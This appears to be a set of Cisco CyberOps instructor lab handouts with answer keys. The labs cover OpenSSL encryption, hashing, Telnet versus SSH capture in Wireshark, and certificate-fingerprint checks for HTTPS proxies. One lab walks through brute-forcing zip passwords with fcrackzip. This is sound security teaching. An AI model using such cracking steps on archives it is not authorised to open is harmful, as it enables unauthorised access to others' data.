AES is a symmetric encryption algorithm This means that the two parties exchanging encrypted
messages must share the secret key in advance.
a. Open the email from your lab partner.
b. Copy the ciphertext and paste it in the text box.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 3 www.netacad.com
Class Activity – Creating Codes

c. Enter the pre-shared secret key.

d. Click on Decrypt and the original cleartext message should be displayed.

What happens if you use a wrong secret key?

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 3 www.netacad.com
Lab - Encrypting and Decrypting Data Using OpenSSL (Instructor
Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Encrypting Messages with OpenSSL
Part 2: Decrypting Messages with OpenSSL

Background / Scenario
OpenSSL is an open source project that provides a robust, commercial-grade, and full-featured toolkit for the
Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols. It is also a general-purpose
cryptography library. In this lab, you will use OpenSSL to encrypt and decrypt text messages.
Note: While OpenSSL is the de facto cryptography library today, the use presented in this lab is NOT
recommended for robust protection. Below are two security problems with this lab:
1) The method described in this lab uses a weak key derivation function. The ONLY security is
introduced by a very strong password.
2) The method described in this lab does not guarantee the integrity of the text file.
This lab should be used for instructional purposes only. The methods presented here should NOT be used to
secure truly sensitive data.

Required Resources
 CyberOps Workstation Virtual Machine
 Internet access

Part 1: Encrypting Messages with OpenSSL

OpenSSL can be used as a standalone tool for encryption. While many encryption algorithms can be used,
this lab focuses on AES. To use AES to encrypt a text file directly from the command line using OpenSSL,
follow the steps below:

Step 1: Encrypting a Text File

a. Log into CyberOPS Workstation VM.
b. Open a terminal window.
c. Because the text file to be encrypted is in the /home/analyst/lab.support.files/ directory, change to that
directory:
[analyst@secOps ~]$ cd ./lab.support.files/
[analyst@secOps lab.support.files]$
d. Type the command below to list the contents of the encrypted letter_to_grandma.txt text file on the
screen:
[analyst@secOps lab.support.files]$ cat letter_to_grandma.txt
Hi Grandma,

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 3 www.netacad.com
Lab – Encrypting and Decrypting Data using OpenSSL

I am writing this letter to thank you for the chocolate chip cookies you sent
me. I got them this morning and I have already eaten half of the box! They
are absolutely delicious!

I wish you all the best. Love,

Your cookie-eater grandchild.
[analyst@secOps lab.support.files]$
e. From the same terminal window, issue the command below to encrypt the text file. The command will use
AES-256 to encrypt the text file and save the encrypted version as message.enc. OpenSSL will ask for a
password and for password confirmation. Provide the password as requested and be sure to remember
the password.
[analyst@secOps lab.support.files]$ openssl aes-256-cbc -in
letter_to_grandma.txt -out message.enc
enter aes-256-cbc encryption password:
Verifying - enter aes-256-cbc encryption password:
[analyst@secOps lab.support.files]$

Document the password.

____________________________________________________________________________________
Student choice of password

f. When the process is finished, use the cat command again to display the contents of the message.enc
file.
[analyst@secOps lab.support.files]$ cat message.enc
Did the contents of the message.enc file display correctly? What does it look like? Explain.
____________________________________________________________________________________
____________________________________________________________________________________
No. The file seems broken as just symbols are displayed. The symbols are shown because OpenSSL has
generated a binary file.
g. To make the file readable, run the OpenSSL command again, but this time add the -a option. The -a
option tells OpenSSL to encode the encrypted message using a different encoding method of Base64
before storing the results in a file.
Note: Base64 is a group of similar binary-to-text encoding schemes used to represent binary data in an
ASCII string format.
[analyst@secOps lab.support.files]$ openssl aes-256-cbc -a -in
letter_to_grandma.txt -out message.enc
enter aes-256-cbc encryption password:
Verifying - enter aes-256-cbc encryption password:
h. Once again, use the cat command to display the contents of the, now re-generated, message.enc file:
Note: The contents of message.enc will vary.
[analyst@secOps lab.support.files]$ cat message.enc
U2FsdGVkX19ApWyrn8RD5zNp0RPCuMGZ98wDc26u/vmj1zyDXobGQhm/dDRZasG7
rfnth5Q8NHValEw8vipKGM66dNFyyr9/hJUzCoqhFpRHgNn+Xs5+TOtz/QCPN1bi
08LGTSzOpfkg76XDCk8uPy1hl/+Ng92sM5rgMzLXfEXtaYe5UgwOD42U/U6q73pj

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 3 www.netacad.com
Lab – Encrypting and Decrypting Data using OpenSSL

a1ksQrTWsv5mtN7y6mh02Wobo3A1ooHrM7niOwK1a3YKrSp+ZhYzVTrtksWDl6Ci
XMufkv+FOGn+SoEEuh7l4fk0LIPEfGsExVFB4TGdTiZQApRw74rTAZaE/dopaJn0
sJmR3+3C+dmgzZIKEHWsJ2pgLvj2Sme79J/XxwQVNpw=
[analyst@secOps lab.support.files]$
Is message.enc displayed correctly now? Explain.
____________________________________________________________________________________
____________________________________________________________________________________
Yes. While message.enc is encrypted, it is now correctly displayed because it has been converted from
binary to text and encoded with Base64.
Can you think of a benefit of having message.enc Base64-encoded?
____________________________________________________________________________________
____________________________________________________________________________________
The encrypted message can now be copied and pasted in an email message, for example.

Part 2: Decrypting Messages with OpenSSL

With a similar OpenSSL command, it is possible to decrypt message.enc.
a. Use the command below to decrypt message.enc:
[analyst@secOps lab.support.files]$ openssl aes-256-cbc –a -d -in message.enc
-out decrypted_letter.txt
b. OpenSSL will ask for the password used to encrypt the file. Enter the same password again.
c. When OpenSSL finishes decrypting the message.enc file, it saves the decrypted message in a text file
called decrypted_letter.txt. Use the cat display the contents of decrypted_letter.txt:
[analyst@secOps lab.support.files]$ cat decrypted_letter.txt
Was the letter decrypted correctly?
____________________________________________________________________________________
____________________________________________________________________________________
Yes, the letter was decrypted correctly.
The command used to decrypt also contains -a option. Can you explain?
____________________________________________________________________________________
____________________________________________________________________________________
Because message.enc was Base64 encoded after the encryption process took place, message.enc must
be Base64 decoded before OpenSSL can decrypt it.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 3 www.netacad.com
Lab - Encrypting and Decrypting Data using a Hacker Tool
(Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Create and Encrypt Files
Part 2: Recover Encrypted Zip File Passwords

Background / Scenario
What if you work for a large corporation that had a corporate policy regarding removable media? Specifically,
it states that only encrypted zipped documents can be copied to portable USB flash drives.
In this scenario, the Chief Financial Officer (CFO) is out-of-town on business and has contacted you in a
panic with an emergency request for help. While out-of-town on business, he attempted to unzip important
documents from an encrypted zip file on a USB drive. However, the password provided to open the zip file is
invalid. The CFO contacted you to see if there was anything you could to do.
Note: The provided scenario is simple and only serves as an example.
There may some tools available to recover lost passwords. This is especially true in situations such as this
where the cybersecurity analyst could acquire pertinent information from the CFO, such as the length of the
password, and an idea of what it could be. Knowing pertinent information dramatically helps when attempting
to recover passwords.
Examples of password recovery utilities and programs include hashcat, John the Ripper, Lophtcrack, and
others. In our scenario, we will use fcrackzip which is a simple Linux utility to recover the passwords of
encrypted zip files.
Consider that these same tools can be used by cybercriminals to discover unknown passwords. Although
they would not have access to some pertinent information, with time, it is possible to discover passwords to
open encrypted zip files. The amount of time required depends on the password strength and the password
length. Longer and more complex passwords (mix of different types of characters) are more secure.
In this lab, you will:
 Create and encrypt sample text files.
 Decrypt the encrypted zip file.
Note: This lab should be used for instructional purposes only. The methods presented here should NOT be
used to secure truly sensitive data.

Required Resources
 CyberOps Workstation Virtual Machine
 Internet access

Part 1: Create and Encrypt Files

In this part, you will create a few text files that will be used to created encrypted zip files in the next step.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 6 www.netacad.com
Lab – Encrypting and Decrypting Data Using a Hacker Tool

Step 1: Create text files.

a. Start the CyberOps Workstation VM.
b. Open a terminal window. Verify that you are in the analyst home directory. Otherwise, enter cd ~ at the
terminal prompt.
c. Create a new folder called Zip-Files using the mkdir Zip-Files command.
d. Move into that directory using the cd Zip-Files command.
e. Enter the following to create three text files.
[analyst@secOps Zip-Files]$ echo This is a sample text file > sample-1.txt
[analyst@secOps Zip-Files]$ echo This is a sample text file > sample-2.txt
[analyst@secOps Zip-Files]$ echo This is a sample text file > sample-3.txt
f. Verify that the files have been created, using the ls command.

Step 2: Zip and encrypt the text files.

Next, we will create several encrypted zipped files using varying password lengths. To do so, all three text
files will be encrypted using the zip utility.
a. Create an encrypted zip file called file-1.zip containing the three text files using the following command:
[analyst@secOps Zip-Files]$ zip –e file-1.zip sample*
b. When prompted for a password, enter a one-character password of your choice. In the example, the letter
B was entered. Enter the same letter when prompted to verify.

c. Repeat the procedure to create the following 4 other files

 file-2.zip using a 2-character password of your choice. In our example, we used R2.
 file-3.zip using a 3-character password of your choice. In our example, we used 0B1.
 file-4.zip using a 4-character password of your choice. In our example, we used Y0Da.
 file-5.zip using a 5-character password of your choice. In our example, we used C-3P0.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 6 www.netacad.com
Lab – Encrypting and Decrypting Data Using a Hacker Tool

d. Verify that all zipped files have been created using the ls -l f* command.

e. Attempt to open a zip using an incorrect password as shown.

[analyst@secOps Zip-Files]$ unzip file-1.zip

Part 2: Recover Encrypted Zip File Passwords

In this part, you will use the fcrackzip utility to recover lost passwords from encrypted zipped files. Fcrackzip
searches each zip file given for encrypted files and tries to guess the password using brute-force methods.
The reason we created zip files with varying password lengths was to see if password length influences the
time it takes to discover a password.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 6 www.netacad.com
Lab – Encrypting and Decrypting Data Using a Hacker Tool

Step 1: Introduction to fcrackzip

a. From the terminal window, enter the fcrackzip –h command to see the associated command options.

In our examples, we will be using the –v, -u, and -l command options. The -l option will be listed last
because it specifies the possible password length. Feel free to experiment with other options.

Step 2: Recovering Passwords using fcrackzip

a. Now attempt to recover the password of the file-1.zip file. Recall, that a one-character password was
used to encrypt the file. Therefore, use the following fcrackzip command:
[analyst@secOps Zip-Files]$ fcrackzip -vul 1-4 file-1.zip

Note: The password length could have been set to less than 1 – 4 characters.
How long does it take to discover the password?
____________________________________________________________________________________
It takes less than a second.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 6 www.netacad.com
Lab – Encrypting and Decrypting Data Using a Hacker Tool

b. Now attempt to recover the password of the file-2.zip file. Recall, that a two-character password was
used to encrypt the file. Therefore, use the following fcrackzip command:
[analyst@secOps Zip-Files]$ fcrackzip –vul 1-4 file-2.zip

How long does it take to discover the password?

____________________________________________________________________________________
It should take about a second.
c. Repeat the procedure and recover the password of the file-3.zip file. Recall, that a three-character
password was used to encrypt the file. Time to see how long it takes to discover a 3-letter password. Use
the following fcrackzip command:
[analyst@secOps Zip-Files]$ fcrackzip –vul 1-4 file-3.zip

How long does it take to discover the password?

____________________________________________________________________________________
Answers will vary depending on platform and actual password used but it should about a second or two.
d. How long does it take to crack a password of four characters? Repeat the procedure and recover the
password of the file-4.zip file. Time to see how long it takes to discover the password using the following
fcrackzip command:
[analyst@secOps Zip-Files]$ fcrackzip –vul 1-4 file-4.zip

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 6 www.netacad.com
Lab – Encrypting and Decrypting Data Using a Hacker Tool

How long does it take to discover the password?

____________________________________________________________________________________
Answers will vary depending on platform and actual password used but it should a few seconds.
e. How long does it take to crack a password of five characters? Repeat the procedure and recover the
password of the file-5.zip file. The password length is five characters, so we need to set the -l command
option to 1-5. Again, time to see how long it takes to discover the password using the following fcrackzip
command:
[analyst@secOps Zip-Files]$ fcrackzip –vul 1-5 file-5.zip

How long does it take to discover the password?

____________________________________________________________________________________
Answers will vary depending on platform and actual password used but it should take about two minutes.
f. Recover a 6 Character Password using fcrackzip
It appears that longer passwords take more time to discover and therefore, they are more secure.
However, a 6 character password would not deter a cybercriminal.
How long do you think it would take fcrackzip to discover a 6-character password?
____________________________________________________________________________________
Answers will vary.
To answer that question, create a file called file-6.zip using a 6-character password of your choice. In our
example, we used JarJar.
[analyst@secOps Zip-Files]$ zip –e file-6.zip sample*
g. Repeat the procedure to recover the password of the file-6.zip file using the following fcrackzip
command:
[analyst@secOps Zip-Files]$ fcrackzip –vul 1-6 file-6.zip
How long does it take fcrackzip to discover the password?
____________________________________________________________________________________
Answers will vary depending on platform and actual password used but it will take much longer (hours).
The simple truth is that longer passwords are more secure because they take longer to discover.
How long would you recommend a password needs to be for it to be secure?
____________________________________________________________________________________
Answers will vary.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 6 www.netacad.com
Lab - Examining Telnet and SSH in Wireshark (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Examine a Telnet Session with Wireshark
Part 2: Examine an SSH Session with Wireshark

Background / Scenario
In this lab, you will configure a router to accept SSH connectivity and use Wireshark to capture and view
Telnet and SSH sessions. This will demonstrate the importance of encryption with SSH.

Required Resources
 CyberOps Workstation VM

Part 1: Examining a Telnet Session with Wireshark

You will use Wireshark to capture and view the transmitted data of a Telnet session.

Step 1: Capture data.

a. Start the CyberOps Workstation VM and log in with username analyst and password cyberops.
b. Open a terminal window and start Wireshark. Press OK to continue after reading the warning message.
[analyst@secOps analyst]$ sudo wireshark-gtk
[sudo] password for analyst: cyberops

(wireshark-gtk:950): WARNING : Couldn't connect to accessibility bus:

Failed to connect to socket /tmp/dbus-REDRWOHelr: Connection refused
Gtk-Message: GtkDialog mapped without a transient parent. This is
discouraged.
c. Start a Wireshark capture on the Loopback: lo interface.
d. Open another terminal window. Start a Telnet session to the localhost. Enter username analyst and
password cyberops when prompted. Note that it may take several minutes for the “connected to
localhost” and login prompt to appear.
[analyst@secOps ~]$ telnet localhost
Trying ::1...
Connected to localhost.
Escape character is '^]'.

Linux 4.10.10-1-ARCH (unallocated.barefruit.co.uk) (pts/12)

secOps login: analyst

Password:
Last login: Fri Apr 28 10:50:52 from localhost.localdomain

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 4 www.netacad.com
Lab - Examining Telnet and SSH in Wireshark

[analyst@secOps ~]$
e. Stop the Wireshark capture after you have provided the user credentials.

Step 2: Examine the Telnet session.

a. Apply a filter that only displays Telnet-related traffic. Enter Telnet in the filter field and click Apply.
b. Right-click one of the Telnet lines in the Packet list section of Wireshark, and from the drop-down list,
select Follow TCP Stream.

c. The Follow TCP Stream window displays the data for your Telnet session with the CyberOps Workstation
VM. The entire session is displayed in plaintext, including your password. Notice that the username that
you entered is displayed with duplicate characters. This is caused by the echo setting in Telnet to allow
you to view the characters that you type on the screen.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 4 www.netacad.com
Lab - Examining Telnet and SSH in Wireshark

d. After you have finished reviewing your Telnet session in the Follow TCP Stream window, click Close.
e. Type exit at the terminal to exit the Telnet session.
[analyst@secOps ~]$ exit

Part 2: Examine an SSH Session with Wireshark

In Part 2, you will establish an SSH session with the localhost. Wireshark will be used to capture and view the
data of this SSH session.
a. Start another Wireshark capture.
b. You will establish an SSH session with the localhost. At the terminal prompt, enter ssh localhost. Enter
yes to continue connecting. Enter the cyberops when prompted.
[analyst@secOps ~]$ ssh localhost
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:uLDhKZflmvsR8Et8jer1NuD91cGDS1mUl/p7VI3u6kI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
analyst@localhost's password:
Last login: Sat Apr 29 00:04:21 2017 from localhost.localdomain
c. Stop the Wireshark capture.
d. Apply an SSH filter on the Wireshark capture data. Enter ssh in the filter field and click Apply.
e. Right-click one of the SSHv2 lines in the Packet list section of Wireshark, and in the drop-down list,
select the Follow TCP Stream option.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 4 www.netacad.com
Lab - Examining Telnet and SSH in Wireshark

f. Examine the Follow TCP Stream window of your SSH session. The data has been encrypted and is
unreadable. Compare the data in your SSH session to the data of your Telnet session.

g. After examining your SSH session, click Close.

h. Close Wireshark.

Reflection
Why is SSH preferred over Telnet for remote connections?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers may vary.
Similar to Telnet, SSH is used to access and execute commands on a remote system. However, SSH
protocol allows users to communicate with remote system securely by encrypting the communications. This
prevents any sensitive information, such as usernames and passwords, from being captured during the
transmission.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 4 www.netacad.com
Lab – Hashing Things Out (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Creating Hashes with OpenSSL
Part 2: Verifying Hashes

Background / Scenario
Hash functions are mathematical algorithms designed to take data as input and generate a fixed-size, unique
string of characters, also known as the hash. Designed to be fast, hash functions are very hard to reverse; it
is very hard to recover the data that created any given hash, based on the hash alone. Another important
property of hash functions is that even the smallest change done to the input data yields a completely
different hash.
While OpenSSL can be used to generate and compare hashes, other tools are available. Some of these tools
are also included in this lab.

Required Resources
 CyberOps Workstation VM
 Internet access

Part 1: Creating Hashes with OpenSSL

OpenSSL can be used as a standalone tool for hashing. To create a hash of a text file, follow the steps below:

Step 1: Hashing a Text File

a. In the CyberOps Workstation virtual machine, open a terminal window.
b. Because the text file to hash is in the /home/analyst/lab.support.files/ directory, change to that directory:
[analyst@secOps ~]$ cd /home/analyst/lab.support.files/
c. Type the command below to list the contents of the letter_to_grandma.txt text file on the screen:
[analyst@secOps lab.support.files]$ cat letter_to_grandma.txt
Hi Grandma,
I am writing this letter to thank you for the chocolate chip cookies you sent me. I
got them this morning and I have already eaten half of the box! They are absolutely
delicious!

I wish you all the best. Love,

Your cookie-eater grandchild.
d. Still from the terminal window, issue the command below to hash the text file. The command will use MD5
as hashing algorithm to generate a hash of the text file. The hash will be displayed on the screen after
OpenSSL has computed it.
[analyst@secOps lab.support.files]$ openssl md5 letter_to_grandma.txt
MD5(letter_to_grandma.txt)= 8a82289f681041f5e44fa8fbeeb3afb6

Notice the format of the output. OpenSSL displays the hashing algorithm used, MD5, followed by the
name of file used as input data. The MD5 hash itself is displayed after the equal (‘=’) sign.
e. Hash functions are useful for verifying the integrity of the data regardless of whether it is an image, a
song, or a simple text file. The smallest change results in a completely different hash. Hashes can be
calculated before and after transmission, and then compared. If the hashes do not match, then data was
modified during transmission.
Let’s modify the letter_to_grandma.txt text file and recalculate the MD5 hash. Issue the command below
to open nano, a command-line text editor.
[analyst@secOps lab.support.files]$ nano letter_to_grandma.txt
Using nano, change the first sentence from ‘Hi Grandma’ to ‘Hi Grandpa’. Notice we are changing only
one character, ‘m’ to ‘p’. After the change has been made, press the <CONTROL+X> keys to save the
modified file. Press ‘Y’ to confirm the name and save the file. Press the <Enter> key and you will exit out
of nano to continue onto the next step.
f. Now that the file has been modified and saved, run the same command again to generate a MD5 hash of
the file.
[analyst@secOps lab.support.files]$ openssl md5 letter_to_grandma.txt
MD5(letter_to_grandma.txt)= dca1cf6470f0363afb7a65a4148fb442
Is the new hash different that hash calculated in item (d)? How different?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Yes. The new hash is completely different than the previous hash.
g. MD5 hashes are considered weak and susceptible to attacks. More robust hashing algorithms include
SHA-1 and SHA-2. To generate a SHA-1 hash of the letter_to_grandma.txt file, use the command below:
[analyst@secOps lab.support.files]$ openssl sha1 letter_to_grandma.txt
SHA1(letter_to_grandma.txt)= 08a835c7bcd21ff57d1236726510c79a0867e861
[analyst@secOps lab.support.files]$
Note: Other tools exist to generate hashes. Namely, md5sum, sha1sum, and sha256sum can be used to
generate MD5, SHA-1 and SHA-2-256 hashes, respectively.
h. Use md5sum and sha1sum to generate MD5 and SHA-1 hash of the letter_to_grandma.txt file:
[analyst@secOps lab.support.files]$ md5sum letter_to_grandma.txt
dca1cf6470f0363afb7a65a4148fb442 letter_to_grandma.txt

[analyst@secOps lab.support.files]$ sha1sum letter_to_grandma.txt

08a835c7bcd21ff57d1236726510c79a0867e861 letter_to_grandma.txt
[analyst@secOps lab.support.files]$

Do the hashes generated with md5sum and sha1sum match the images generated in items (g) and (h),
respectively? Explain.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Yes. While different tools are used, they use the same hashing algorithm and input data.

Note: While SHA-1 has not yet been effectively compromised, computers are becoming more and more
powerful. It is expected that this natural evolution will soon make it possible for attackers to break SHA-1.
In a proactive move, SHA-2 is now the recommended standard for hashing. It is also worth noting that
SHA-2 is in fact, a family of hashing algorithms. The SHA-2 family is comprised of six hash functions,
namely SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224, SHA-512/256. These functions generate
hash values that are 224, 256, 384 or 512 bits long, respectively.
Note: The CyberOPS VM only includes support for SHA-2-224, SHA-2-256, and SHA-2-512
(sha224sum, sha256sum, and sha512sum, respectively).

Part 2: Verifying Hashes

As mentioned before, a common use for hashes is to verify file integrity. Follow the steps below to use SHA-
2-256 hashes to verify the integrity of sample.img, a file downloaded from the Internet.
a. Along with sample.img, sample.img_SHA256.sig was also downloaded. sample.img_SHA256.sig is a file
containing the SHA-2-256 computed by the website. First, use the cat command to display the contents of
the sample.img_SHA256.sig file:
[analyst@secOps lab.support.files]$ cat sample.img_SHA256.sig
c56c4724c26eb0157963c0d62b76422116be31804a39c82fd44ddf0ca5013e6a
b. Use SHA256sum to calculate the SHA-2-256 hash of the sample.img file:
[analyst@secOps lab.support.files]$ sha256sum sample.img
c56c4724c26eb0157963c0d62b76422116be31804a39c82fd44ddf0ca5013e6a sample.img
Was the sample.img correctly downloaded? Explain.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Yes. Because both hashes match, the hash calculated before download and the one calculated after, it is
correct to state that no errors were introduced during download.
Note: While comparing hashes is a relatively robust method detect transmission errors, there are better
ways to ensure the file has not been tampered with. Tools such as gpg provide a much better method for
ensuring the downloaded file has not been modified by third parties, and is in fact the file the publisher
meant to publish.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 3 www.netacad.com
Lab – Certificate Authority Stores (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Objectives
Part 1: Certificates Trusted by Your Browser
Part 2: Checking for Man-In-Middle

Background / Scenario
As the web evolved, so did the need for security. HTTPS (where the ‘S’ stands for security) along with the
concept of a Certificate Authority was introduced by Netscape back in 1994 and is still used today. In this lab,
you will:
 List all the certificates trusted by your browser (completed on your computer)
 Use hashes to detect if your Internet connection is being intercepted (completed in the CyberOps VM)

Required Resources
 CyberOps Workstation VM
 Internet access

Part 1: Certificates Trusted by Your Browser

HTTPS relies on a third-party entity for validation. Known as Certification Authority (CA), this third-party entity
verifies if a domain name really belongs to the organization claiming its ownership. If the verification checks,
the CA creates a digitally signed certificate containing an information about the organization, including its
public key.
The entire system is based on the fact that web browsers and operating systems ship with a list of CAs they
trust. Any certificates signed by any of the CAs in the list will be seen by the browser as legitimate and be
automatically trusted. To make the system more secure and more scalable, CAs often spread the task of
creating and signing certificates among many child CAs. The parent CA is known as the Root CA. If a
browser trusts a Root CA, it also trusts all of its children CAs.
Note: While the certificate stores are similar across browsers, this lab focuses on Chrome 56 and Firefox 59.
The menu and graphics may be different for other versions of the web browser.
Follow the steps to display the CA store in your browser:

Step 1: Display the Root Certificates in Chrome.

You can do this step on your local machine or use FireFox in the CyberOps Workstation VM. If you use
Firefox, proceed to Step 2. If you use a browser other than Chrome or Firefox, search the Internet for the
steps to display your root certificates.
Note: The menu and graphics may be different for other versions of the Chrome browser.
a. Open the Chrome web browser on your PC.

b. Click the three dot icon on the far right of the address bar to display Chrome’s options.

c. Click Settings and then click Show advanced Settings.

d. Scroll down the page and click the Manage certificates… button, under the HTTPS/SSL section.

e. In the Certificates window that opens, select the Trusted Root Certification Authorities tab. A window
opens that shows all certificates and certificate authorities trusted by Chrome.

Step 2: Display the Certificates in the CA Store in Firefox.

Note: The menu and graphics may be different for other versions of the Firefox browser and between different
operating systems. Firefox 59 on the CyberOps Workstation VM is shown in this step.

a. Open Firefox and click the Menu icon. The Menu icon is located on the far right of the Firefox window,
next to the address bar.

b. Click Preferences > Privacy & Security.

c. Scroll down to the Security section and click View Certificates.

d. A window opens that shows the certificates and certification authorities trusted by Firefox.

Part 2: Checking for Man-In-Middle

This part is completed using the CyberOps Workstation VM.
A common use for hashes is to verify data integrity, but they can also be used to detect HTTPS man-in-the-
middle attacks.
To protect user data, more and more websites are switching to encrypted traffic. Known as HTTPS, sites use
protocols such as TLS/SSL to encrypt user traffic from end to end. After the traffic is properly encrypted, it is
very difficult for any party other than the user and the site in question to see the contents of the encrypted
message. This is good for users but it creates a problem for organizations that want to look into that traffic.
Companies and organizations often choose to peek into employee-generated traffic for monitoring purposes.
They needed to be able to look into TLS/SSL-encrypted traffic. This is done by using an HTTPS proxy.
Web browsers trust the identity of a visited web site if the certificate presented by that web site is signed by
one of the CAs installed in the browser’s certificate store. To be able to peek into its users’ TLS/SSL-
encrypted traffic, a company or organization simply adds another CA into the user’s browser list of installed
CA.
Consider the following scenario: Company X hires a new employee and provides him with a new company
laptop. Before handing over the laptop, the company IT department installs all the software necessary for the
work. Among the software and packages that are installed, the IT department also includes one extra CA to
the list of trusted CAs. This extra CA points to a company-controlled computer known as the HTTPS proxy.
Because the company controls traffic patterns, the HTTPS proxy can be placed in the middle of any
connection. It works like this:
1. The user attempts to establish a secure connection to HTTPS web site H, hosted on the Internet. H can
be any HTTPS site: a bank, online store, email server, etc.
2. Because the company controls traffic patterns, it makes it so that all user traffic must traverse the HTTPS
proxy. The HTTPS proxy then impersonates web site H and presents a self-signed certificate to prove it is
H. The HTTPS proxy essentially says “Hi there, I am HTTPS site H. Here’s my certificate. It’s has been
signed by… myself.”

3. Because the presented certificate is signed by one of the CAs included in the laptop’s CA store
(remember, it was added by IT), the web browser mistakenly believes it is indeed communicating with H.
Notice that, had the extra CA not been added to the CA store, the laptop would not trust the certificate
and immediately realize that someone else was trying to impersonate H.
4. The laptop trusts the connection and establishes a secure channel with the HTTPS proxy, mistakenly
believing it is communicating securely with H.
5. The HTTPS proxy now establishes a second secure connection to H, the web site the user was trying to
access from the beginning.
6. The HTTPS proxy is now the end point of two separate secure connections; one established with the user
and another established with H. Because the HTTPS is the end point of both connections, it can now
decrypt traffic from both connections.
7. The HTTPS proxy can now receive TLS/SSL-encrypted user traffic destined to H, decrypt it, inspect it, re-
encrypt it using TLS/SSL and send it to H. When H responds, the HTTPS proxy reverses the process
before forwarding the traffic to the user.
Notice that process is mostly transparent to the user, who sees the connection as TLS/SSL-encrypted (green
marks on the browser). While the connection is secure (TLS/SSL-encrypted), it has been established to a
spurious web site.
Even though their presence is mostly transparent to the user, TLS proxies can be easily detected with the
help of hashes. Considering the example above, because the HTTPS proxy has no access to the site H
private keys, the certificate it presents to the user is different than the certificate presented by H. Included in
every certificate is a value known as a fingerprint. Essentially a hash calculated and signed by the certificate
issuer, the fingerprint acts as a unique summary of all the contents of the certificate. If as much as one letter
of the certificate is modified, the fingerprint will yield a completely different value when calculated. Because of
this property, fingerprints are used to quickly compare certificates. Returning to the example above, the user
can request H’s certificate and compare the fingerprint included in it with the one provided when the
connection to the web site H was established. If the fingerprints match, the connection is indeed established
to H. If the fingerprints do not match, the connection has been established to some other end point.
Follow the steps below to assess if there’s a HTTPS proxy in your connection.

Step 1: Gathering the correct and unmodified certificate fingerprint.

a. The first step is to gather a few site fingerprints. This is important because these will be used for
comparison later. The table below contains a few site certificate fingerprints from popular sites.
Note: The SHA-1 fingerprints shown in Table 1 may no longer be valid as organizations regularly renew their
certificates. A fingerprint is also called a thumbprint in Windows-based machines.
Table 1 - Popular Sites and Their SHA-1 Certificate Fingerprints

Site Domains Covered Certificate SHA-1 Fingerprint

By Certificate (as of April 2018)

www.cisco.com www.cisco.com 64:19:CA:40:E2:1B:3F:92:29:21:A9:CE:60:7D:C9:0C:39:B5:71:3E

www.facebook.com *.facebook.com BD:25:8C:1F:62:A4:A6:D9:CF:7D:98:12:D2:2E:2F:F5:7E:84:FB:36
www.wikipedia.org *.wikipedia.org 4B:3E:D6:B6:A2:C7:55:E8:56:84:BE:B1:42:6B:B0:34:A6:FB:AC:24
twitter.com twitter.com 26:5C:85:F6:5B:04:4D:C8:30:64:5C:6F:B9:CF:A7:D2:8F:28:BC:1B
www.linkedin.com www.linkedin.com 3A:60:39:E8:CE:E4:FB:58:87:B8:53:97:89:8F:04:98:20:BF:E3:91

What are the fingerprints? Why are they important?

Step 2: Gather the certificate fingerprint in use by the CyberOps Workstation VM.
Now that we have the actual fingerprints, it is time to fetch fingerprints from a local host and compare the
values. If the fingerprints do not match, the certificate in use does NOT belong to the HTTPS site being
verified, which means there’s an HTTPS proxy in between the host computer and the HTTPS site being
verified. Matching fingerprints means no HTTPS proxy is in place.
a. Use the three piped commands below to fetch the fingerprint for Cisco.com. The line below uses
OpenSSL to connect to cisco.com on port 443 (HTTPS), request the certificate and store it on a text file
named cisco.pem. The output is also shown for context.
[analyst@secOps ~]$ echo -n | openssl s_client -connect cisco.com:443 | sed
-ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ./cisco.pem
depth=2 C = BM, O = QuoVadis Limited, CN = QuoVadis Root CA 2
verify return:1
depth=1 C = US, O = HydrantID (Avalanche Cloud Corporation), CN = HydrantID SSL ICA G2
verify return:1
depth=0 C = US, ST = CA, L = San Jose, O = "Cisco Systems, Inc.", CN = www.cisco.com
verify return:1
DONE

b. Optionally, use the cat command to list the contents of the fetched certificate and stored in the
cisco.pem text file:
[analyst@secOps ~]$ cat cisco.pem
-----BEGIN CERTIFICATE-----
MIIG1zCCBL+gAwIBAgIUKBO9xTQoMemc9zFHNkdMW+SgFO4wDQYJKoZIhvcNAQEL
BQAwXjELMAkGA1UEBhMCVVMxMDAuBgNVBAoTJ0h5ZHJhbnRJRCAoQXZhbGFuY2hl
